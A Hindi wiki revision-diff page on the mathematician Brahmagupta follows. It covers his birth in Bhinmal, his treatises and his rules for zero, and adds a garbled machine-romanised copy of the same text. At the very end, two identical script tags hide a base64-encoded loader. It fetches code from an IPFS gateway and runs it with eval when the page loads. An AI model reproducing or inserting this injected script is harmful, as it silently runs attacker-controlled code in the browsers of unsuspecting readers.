Difference between revisions of "ब्रह्मगुप्त"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
ब्रह्मगुप्त गणित ज्योतिष के बहुत बड़े आचार्य थे। [[आर्यभट्ट]] के बाद [[भारत]] के पहले गणित शास्त्री '[[भास्कराचार्य|भास्कराचार्य प्रथम]]' थे। उसके बाद ब्रह्मगुप्त हुए। ब्रह्मगुप्त खगोल शास्त्री भी थे और आपने 'शून्य' के उपयोग के नियम खोजे थे। इसके बाद [[अंकगणित]] और [[बीजगणित]] के विषय में लिखने वाले कई गणितशास्त्री हुए।  प्रसिद्ध ज्योतिषी [[भास्कराचार्य]] ने इनको 'गणकचक्र - चूड़ामणि' कहा है और इनके मूलाकों को अपने 'सिद्धान्त शिरोमणि' का आधार माना है। इनके ग्रन्थों में सर्वप्रसिद्ध हैं, 'ब्रह्मस्फुटसिद्धान्त' और 'खण्ड-खाद्यक'। ख़लीफ़ाओं के राज्यकाल में इनके अनुवाद [[अरबी भाषा]] में भी कराये गये थे, जिन्हें अरब देश में 'अल सिन्द हिन्द' और 'अल अर्कन्द' कहते थे। पहली पुस्तक 'ब्रह्मस्फुट सिद्धान्त' का अनुवाद है और दूसरी 'खण्ड-खाद्यक' का अनुवाद है।  
+
ब्रह्मगुप्त गणित ज्योतिष के बहुत बड़े आचार्य थे। [[आर्यभट्ट]] के बाद [[भारत]] के पहले गणित शास्त्री '[[भास्कराचार्य|भास्कराचार्य प्रथम]]' थे। उसके बाद ब्रह्मगुप्त हुए। ब्रह्मगुप्त खगोल शास्त्री भी थे और आपने 'शून्य' के उपयोग के नियम खोजे थे। इसके बाद [[अंकगणित]] और [[बीजगणित]] के विषय में लिखने वाले कई गणितशास्त्री हुए।  प्रसिद्ध ज्योतिषी भास्कराचार्य ने इनको 'गणकचक्र - चूड़ामणि' कहा है और इनके मूलाकों को अपने 'सिद्धान्त शिरोमणि' का आधार माना है। इनके ग्रन्थों में सर्वप्रसिद्ध हैं, 'ब्रह्मस्फुटसिद्धान्त' और 'खण्ड-खाद्यक'। ख़लीफ़ाओं के राज्यकाल में इनके अनुवाद [[अरबी भाषा]] में भी कराये गये थे, जिन्हें अरब देश में 'अल सिन्द हिन्द' और 'अल अर्कन्द' कहते थे। पहली पुस्तक 'ब्रह्मस्फुट सिद्धान्त' का अनुवाद है और दूसरी 'खण्ड-खाद्यक' का अनुवाद है।  
  
 
आचार्य ब्रह्मगुप्त का जन्म [[राजस्थान]] राज्य के 'भीनमाल शहर' में ईस्वी सन 598 में हुआ था। इसी वजह से उन्हें भिल्लमालआचार्य के नाम से भी कई जगह उल्लेखित किया गया है। यह शहर तत्कालीन [[गुजरात]] प्रदेश की राजधानी तथा [[हर्षवर्धन]] साम्राज्य के राजा 'व्याघ्रमुख' के समकालीन माना जाता है। वे तत्कालीन गुर्जर प्रदेश [[भीनमाल]] के अन्तर्गत आने वाले प्रख्यात शहर [[उज्जयिनी|उज्जैन]] (वर्तमान [[मध्य प्रदेश]]) की अन्तरिक्ष प्रयोगशाला के प्रमुख थे और इस दौरान उन्होंने दो विशेष ग्रन्थ लिखे:  
 
आचार्य ब्रह्मगुप्त का जन्म [[राजस्थान]] राज्य के 'भीनमाल शहर' में ईस्वी सन 598 में हुआ था। इसी वजह से उन्हें भिल्लमालआचार्य के नाम से भी कई जगह उल्लेखित किया गया है। यह शहर तत्कालीन [[गुजरात]] प्रदेश की राजधानी तथा [[हर्षवर्धन]] साम्राज्य के राजा 'व्याघ्रमुख' के समकालीन माना जाता है। वे तत्कालीन गुर्जर प्रदेश [[भीनमाल]] के अन्तर्गत आने वाले प्रख्यात शहर [[उज्जयिनी|उज्जैन]] (वर्तमान [[मध्य प्रदेश]]) की अन्तरिक्ष प्रयोगशाला के प्रमुख थे और इस दौरान उन्होंने दो विशेष ग्रन्थ लिखे:  

Revision as of 14:37, 14 February 2011

brahmagupt ganit jyotish ke bahut b de achary the. aryabhatt ke bad bharat ke pahale ganit shastri 'bhaskarachary pratham' the. usake bad brahmagupt hue. brahmagupt khagol shastri bhi the aur apane 'shoony' ke upayog ke niyam khoje the. isake bad aankaganit aur bijaganit ke vishay mean likhane vale kee ganitashastri hue. prasiddh jyotishi bhaskarachary ne inako 'ganakachakr - choo damani' kaha hai aur inake moolakoan ko apane 'siddhant shiromani' ka adhar mana hai. inake granthoan mean sarvaprasiddh haian, 'brahmasphutasiddhant' aur 'khand-khadyak'. khalifaoan ke rajyakal mean inake anuvad arabi bhasha mean bhi karaye gaye the, jinhean arab desh mean 'al sind hind' aur 'al arkand' kahate the. pahali pustak 'brahmasphut siddhant' ka anuvad hai aur doosari 'khand-khadyak' ka anuvad hai.

achary brahmagupt ka janm rajasthan rajy ke 'bhinamal shahar' mean eesvi san 598 mean hua tha. isi vajah se unhean bhillamalachary ke nam se bhi kee jagah ullekhit kiya gaya hai. yah shahar tatkalin gujarat pradesh ki rajadhani tatha harshavardhan samrajy ke raja 'vyaghramukh' ke samakalin mana jata hai. ve tatkalin gurjar pradesh bhinamal ke antargat ane vale prakhyat shahar ujjain (vartaman madhy pradesh) ki antariksh prayogashala ke pramukh the aur is dauran unhoanne do vishesh granth likhe:

  1. brahmasphutasiddhant (san 628 mean) aur
  2. khand-khadyak (san 665 ee mean).

'brahmasphut siddhaant' sabase pahala granth mana jata hai jisamean shoony ka ek vibhinn aank ke roop mean ullekh kiya gaya hai. yahi nahian, balki is granth mean rrinatmak aankoan aur shoony par ganit karane ke sabhi niyamoan ka varnan bhi kiya gaya hai. brahmagupt shoony se bhag karane ka niyam sahi nahian de paye: 0/0 = 0. unhoanne shak samvat 550 (685 vi.) mean 'brahmasphutik siddhant' ki rachana ki. inhoanne sthan-sthan par likha hai ki aryabhatt, shrishen, vishnuchandr adi ki ganana se grahoan ka spasht sthan shuddh nahian ata hai, isalie ve tyajy haian aur 'brahmasphutik siddhant' mean drigganitaiky hota hai, isaliy yahi manana chahie. isase siddh hota hai ki brahmagupt ne 'brahmasphutik siddhant' ki rachana grahoan ka pratyaksh vedh karake ki thi aur ve is bat ki avashyakata samajhate the ki jab kabhi ganana aur vedh mean antar p dane lage to vedh ke dvara ganana shuddh kar leni chahie. ye pahale achary the jinhoanne ganit jyotish ki rachana vishesh kram se ki aur jyotish aur ganit ke vishayoan ko alag-alag adhyayoan mean baanta.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>